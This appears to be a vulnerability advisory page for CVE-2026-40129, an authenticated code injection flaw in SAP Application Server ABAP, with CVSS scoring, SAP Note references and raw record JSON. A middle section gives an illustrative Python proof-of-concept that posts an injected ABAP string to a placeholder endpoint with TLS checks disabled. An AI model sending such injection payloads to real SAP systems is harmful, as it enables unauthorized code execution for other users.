Security Vulnerability Report
CVE-2026-40129 CVSS 4.3 MEDIUM

Published: 2026-05-12 03:16:12
Last Modified: 2026-05-12 03:16:12

Description

Due to a Code Injection vulnerability in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform, an authenticated attacker could send specially crafted inputs to the application. If processed by the application, this input could be delivered to users subscribed to the channel and result in execution. Successful exploitation could enable the attacker to execute arbitrary code for other users, resulting in a low impact on the integrity, with no impact to the confidentiality and availability of the system.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available in the record. The affected products, as listed by the vendor, are:

SAP NetWeaver (Specific versions to be checked in SAP Note 3735359)
SAP ABAP Platform (Specific versions to be checked in SAP Note 3735359)
SAP Application Server ABAP (Specific versions to be checked in SAP Note 3735359)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# SAP Application Server ABAP Code Injection PoC Concept
# This script demonstrates how an authenticated attacker might send a crafted payload.
# Note: This is a theoretical example for educational purposes.

# Placeholders in angle brackets must be replaced for an authorized test system.
TARGET_URL = "http[s]://<target-host>:<port>/sap/bc/webdynpro_abap/<vulnerable_component>"
SESSION_COOKIE = "sap-usercontext=<context>; MYSAPSSO2=<token>"

# The payload attempts to inject ABAP code that may be executed when processed by the channel.
# Example: Simple command execution or data modification payload.
PAYLOAD = "test_data'); WRITE: / 'Injected Code via CVE-2026-40129'. ."

headers = {
    "Cookie": SESSION_COOKIE,
    "User-Agent": "Mozilla/5.0 (Compatible; PoC-Analyzer)",
    "Content-Type": "application/x-www-form-urlencoded",
}
data = {
    "channel_input": PAYLOAD,
    "submit": "Submit",
}

try:
    # verify=False disables TLS certificate validation; acceptable only against a lab host.
    response = requests.post(TARGET_URL, headers=headers, data=data, verify=False)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check the subscribed channel for execution results.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

SAP Note 3735359: https://me.sap.com/notes/3735359
SAP Security Patch Day: https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-40129",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T03:16:11.783",
    "lastModified": "2026-05-12T03:16:11.783",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Due to a Code Injection vulnerability in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform, an authenticated attacker could send specially crafted inputs to the application. If processed by the application, this input could be delivered to users subscribed to the channel and result in execution. Successful exploitation could enable the attacker to execute arbitrary code for other users, resulting in a low impact on the integrity, with no impact to the confidentiality and availability of the system."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3735359",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}